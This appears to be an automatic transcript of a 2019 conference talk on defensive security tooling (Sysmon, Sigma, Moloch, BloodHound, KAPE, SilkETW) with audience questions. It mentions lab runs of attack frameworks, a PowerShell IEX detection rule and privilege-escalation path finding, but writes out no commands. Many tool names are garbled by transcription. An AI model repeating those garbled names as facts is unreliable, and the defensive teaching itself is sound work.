BSides Toronto 2019 Anton Ovrutsky

hey everyone welcome to beyond logs why it's an exciting time to be a defender with myself ants on roots Keith before we get started with the actual content of the talk I just wanted to give a brief outline of kind of like why this talk exists and why I'm here a couple months ago I was lucky enough to be on the build team for c3x that you just really eloquently heard about and as part of that process I was telling the other build members how excited I was for the students to kind of see the logs that we had configured for them just because I'm a huge nerd I love logs so I was excited to kind of share those

with the students and for them to to kind of see what attacks look like in a network that's primarily Windows and then from there I had like a cosmic brain moment where I thought you know it's just not just an exciting time for the students I think it's an exciting time to be a defender in this space generally just because there's a lot of new tooling a new data points available to people in this space and I hope that by the end of this talk everyone kind of agrees with me so with that in mind here's what we're gonna talk about I'm gonna start off with my personal favorite is this mom move on yeah that's right it's a small

right move on over to generic rule formats with Sigma and the network monitoring side of things with mohawk full packet capture then Active Directory with bloodhound and then rounding off with cape and silk etw so let's just start off with this mahn and I think traditionally the view of saman has been kind of you know you install on a system and it gives you a bunch of new events that you have to work with and those events are kind of isolated from each other and I think that this image made by Roberto Rodriguez when he worked as backdrops does a really good job of kind of showing us that saman is not just a list

of events it's its own ecosystem kind of like living and breathing and the events are all connected to each other and at the kind of heart of that is the process event and some of you may have heard the concept of moving from lists to graphs when you're thinking about you know defense of architecture and logging and stuff like that and I think viewing so smart events Way helps us to kind of drive towards that concept so here's how I kind of envisioned that and the first example I'm gonna go over is just image load events these are type seven from just mom so this query is just showing you I know it's kinda hard to see but the like

the text doesn't really matter it's just kind of like how its presented is what I'm driving towards so in this case the query is just showing you what images are loaded by this executable and in this case the executable is the silent Trinity stager it's a new c2 framework that was released in the last couple months so you're not looking at the events kind of in a list format you're looking at them in a what was done by this process kind of way so it's just more helpful to look at events this way and the slides will be available after and you can kind of like copy my query if you want after that look at this kind

of same concept another way you can combine process and network events was this one as well to give you a really powerful view of what's going on and in this particular case this is Metasploit payload so it's just using a PowerShell script I think looking at this event or looking at these events this way kind of helps you from an alarming point of view as well so you might not want to alert every time PowerShell makes a network connection because that probably happens pretty often but you might want to alert if PowerShell makes a network connection with a nasty command line like this so taking this concept as kind of logical conclusion just show me everything so

this particular query is just selecting all the values that this one has based on a particular process gooood and then if there's more than two event types associated with that process gooood it's returning results so in this particular case I ran PowerShell three times on a test system but only one of those times was PowerShell actually doing anything malicious and that's the bottom event there and the difference between that I know it's hard to see is that the bottom event has a network connect event associated with with the powershell process so the powershell open and the creative files that connected two pipes in all the instances but only in the third one did it actually make a network connection so

you know if you have like tens of thousands of events to sift through these kinds of queries can kind of help you at least narrow down your results and give you kind of like where do you want to start looking at first we could view this a different way and this is just a force-directed visualization for Splunk and you can kind of see you don't necessarily know there's something malicious happen on the system but you see that top left corner there's just more stuff going on so if you're looking at again thousands of systems at once views like this will help you kind of narrow down where you want to start looking at first so moving over to Sigma

and the Sigma is just the tool that allows you to write generic rule formats so you're not writing a query that's specific to our exciter Splunk or elastic you can write it in a sigma format and then convert it to those other systems I just wanted to quickly highlight when you feature of Sigma value modifiers so on the left hand side is a Sigma rule looking for PowerShell IEX which is invoke expression and what this rule is doing is looking for the base64 offsets of IX so when you convert that rule in my case to a Splunk query you can see on the bottom right there that is spitting out the base64 values of IX so this saves you just a ton of

time from having to convert you know your your different queries from basics before or base 32 or whatever you whatever you happen to be doing there's a bunch of other benefits to Sigma as well chief among them is just easier to write some rules this way you don't have to log into your cell you just write the rule in the regular text editor there's space for comments and tags and because these the rules are just text files you can treat them as config files so if you use github or something like that you can do version control and change control and all that fun stuff like I mentioned the queries are portable so you can write a query in elastic and I

convert it to whatever sim format you like and you can also share for your use so if you write a really cool one please share it moving on to the network side of things with Moloch full packet capture this is kind of what it looks like it's a product made by AOL fully open source modular runs elastic search on the backend and Moloch itself is kind of it's meant to sit at the end of a tap or span port or a network packet broker device or something like that and it just sucks in and indexes packets for you and it presents them and it's really really awesome GUI that's really easy to use and the search

query for this is similar to Wireshark so if you used to manipulating packets or searching for packets in Wireshark molecule field at home one of the cool features about mahlock two is that it's able to run sericata IDs on the same box and the eve JSON file that is generated by surakarta can be fed back into mahlock to enrich the packet data so you don't just look at the IDS alert you're looking at the full packet that that idea so they're fired on so really handy to have really powerful stuff another feature of Mohawk is that it's capable of calculating and showing uj3 hashes and for those of you who are not aware j-3 is a technology that'll fingerprint

a TLS connection so on the left hand side there you see the TLS handshake occurring and the kind of bytes of those packets are hashed together to make a ja3 hash and you can kind of see how Moloch displays that and what you can do from there is use a service like j-3 year to look up that j-3 hash to see kind of what client it belongs to so in this case a the j-3 hash that I'm looking at is a meterpreter payload

there's a bunch of additional features for Maalik as well it has a wide service so it's capable of ingesting and data from something like APO or as 2cm to enrich the IP data so you're looking at host names and user names not IP addresses you can take it and vulnerability feeds from something like alienvault OGX as well and you can translate those j3 hashes to friendly names and start to kind of baseline your environment and get an idea of kind of what's talking to what / encrypt the channels Moloch also has the air support so if you're into writing IRA rules Moloch is capable of processing those it's modular scalable so if you have a

network with a bunch of different segments you can put in a bunch of different ball lock capture nodes to kind of suck in packets from all those networks and Moloch also has a really great slack channel I recently deployed this in my environment and you know being a noob I asked a whole bunch of annoying questions and they're really kind and patient with me so if you do decide to try it check out the slack Channel they're really nice and helpful it also has an API so you can get data back out of it click actions so you're not copy and pasting values from it you can just kind of right-click on an element and send it

to a service of your choice like virustotal or gray noise and you can do hunts as well so you can write like a regex query and tomahawk I want to find this particular reg X over X period of time and while I will kind of do that search for you so really powerful stuff it's kind of amazing that it's free so moving over on to the ad side of things of bloodhound and bloodhound itself has traditionally kind of been viewed as an offensive security tool but defenders can use it as well and if you haven't seen it this is kind of what it looks like this screenshot here is just showing you how to get from a low privileged user on the

left-hand side to a high privilege account on the right in a graph format I get asked a lot kind of like I've heard of bloodhound but but what do I do with it chief among the things you can do with it is find a path from a low privilege user to domain admin keeping in mind that domain admins may not be the kind of the crown jewels in your organization you can find kerberos double users so that's service accounts weak passwords basically all your Active Directory secrets especially if they have to do with like group memberships or I'll use the bloodhound will do a good job of collecting that data and visualizing it for you and this is something that I

haven't personally played with too much but if anyone out there has please let me know is feeding the data that is collected by bloodhound back into the sim and my thinking there is that you know if you're looking at two or three accounts that potentially got compromised you might want to know that one of those accounts is admin to a hundred systems versus one of them accounts being admin to two systems so that's the kind of data that bloodhound can easily provide for you whatever you do please if you find value out of bloodhound uh please donate that's kind of their unofficial donation channel there the Muscular Dystrophy Association

moving over to Cape now Cape stands for Kroll artefact parser and extractor so kind of a mouthful it was written pretty recently by Eric Zimmerman and this is kind of what it looks like this is the GUI front-end to Cape called G Cape and on the left hand side there is kind of what you want collected from your system so you can see by the size of the scroll bar scroll bar there that Cape is capable of collecting a whole bunch of data for you it could do master file table memory dumps all kinds of stuff on the right hand side is you telling Cape what you want done with that data how you wanted parsed and processed Cape

supports a whole bunch of different collection methods and parsers and all that and they're always being updated so the idea here is that you would kind of build what you want Cape to do via the GUI and then you would just copy out that command line and kind of run it on the endpoints that you believe to be potentially compromised and this is kind of just what the output looks like from Cape on the right hand side is just the output from IP config and that's that so really simple stuff but but stuff that's actually really handy to have if you're you know looking at malicious things in a network rounding off now with so PTW which is

kind of the newest tool out there for us defenders so traditionally etw or trace logs and windows have been really hard to kind of collect you needed a C++ program or some kind of weird powershell wrapper and even if that did work the file that would be generated would just be like a flat text file that's really difficult to work with so one of the main features of so PTW is that it's able to collect those event race logs and kind of shove them into the amount log so you can collect it with your beats agent or wife or Splunk forwarder whatever you're using it also runs as a service so if you're actually using it in production

you know it's capable of doing that for you in this example what I'm doing is running excuse me running the sound Trinity stager so the same one that I showed earlier but this is just the powershell version of it and it's being reflectively loaded so that's kind of like the new hotness in the offensive space and this is what the output of so PTW looks like and I know it's hard to see but on the right hand side there this query is just showing you so DW collecting the info from the silent Trinity stager and it's loading a boo laying actually executable or assembly I haven't run this in production so I haven't run this in scale and I haven't

looked at the data but I would imagine that in most environments something loading booing assemblies in memory would be anomalous and would probably warrant a second look and I'm kind of taking this concept further and I'm linking the ATW logs to the system on logs via the process ID so in this example I get to see the command line the parent command line as well as the images that were loaded all in memory so it's combining two really powerful sources of logs and giving you quite a bit of visibility so takeaways kind of I hope that I hope that I went through a lot here and I hope that everyone kind of sees that there's a lot of stuff

available to in the defense of space most of what I covered is free I think with the exception of Splunk most of it is available today most of it is pretty well documented and if it's not there's a slack channel somewhere where you'll find help so I think that there's a lot of excitement in this space because of all those factors the second point there I think moving from lists graphs is incredibly powerful and necessary to catch up with all the cool stuff that the red teams are doing the the middle point they're using your data I think that's also important I think a lot of us probably have such monologues available to us but we're not really

combining them in a way that's this mahn kind of allows for the second last point there is that this is all really hard there's a lot of configuration involved the spaces the little tabs the field names all that stuff will drive you insane so if you're trying to you know replicate this in a lab or at work and you're running at the problems don't feel alone even putting these slides together for the screenshots was incredibly difficult and the last point there visibility rules and I mean that in kind of two ways rules is and like O'Doyle rules like visibility is awesome and and then the second sense is that it rules meaning it takes priority so if you have

like a network segment or you have Windows boxes or Linux boxes or whatever you're not getting logs from them start because it's just becoming critically important I'll end it there any questions

[Applause] oh right very good talk sir thank you it's a question for you but I think with a lot of the open-source defensive tools that are out there which are amazing system on and all the stuff you're showing there's still always a lot of at the almost enterprise level you don't always see a lot of adoption mm-hmm and I think on one hand there's the you know just hey well this doesn't come with support and a license and that weird sense of like I'd rather pay for something yeah but aside from that do you think one of the problems is cuz and you know I know this can happen with system owner silky T W is just the matter that as great as

these tools are as is at scale they start becoming very difficult to manage yeah do you have a opinion on that yeah so yeah installing so small so PTW like in a lab environment or something you know pretty simple at scale becomes increasingly difficult and by particular environment i runs to spawn on about a thousand endpoints and we had to write a custom map that took care of the config changes so the app basically goes out and looks for if a master config file was changed and if it was it cycles it so there's a lot of like just because this man exists doesn't mean that you can just install it in your production environment tomorrow unfortunately but i

think that the benefit it provides same with silky TW and the flexibility it offers you I find that like I've worked with a couple EDRs and they all miss certain things and that's okay but you can't really you can't write your own stuff for a lot of these ddr's and if you can it's like an add-on product so I think that's kind of where the benefit of system on and some key W in tools like that are but yeah if your organization doesn't like open source for whatever reason I mean it becomes a business decision at that point of you know examining the risk of getting hacked versus the risk of your open source software crapping out on you so I

know that the decision I would make personally but every organization is different hope that answers the question by the way good question Lee because my question is very similar to yours so I use the Holy Trinity which is the since Manas query and volatility my question actually was originally similar to what Lee had asked so my EPS in an enterprise environment is terribly low because it doesn't scale so I'm gonna change my question and ask you what are your thoughts on actually augmenting us query and volatility in an enterprise model that's a really good question I I haven't used that was query in a production environment myself I played with at home I think it's awesome

but in terms of volatility I don't know like I'm not sure if you use case and I don't know how you're using that day to day my understanding of volatility that it was kind of like and after the fact that you take the memory dump of a compromised system and then you analyze it after so I think I don't really have a good answer to your question but it sounds like you're doing amazing work and you're on the right track any more questions all right well thank you very much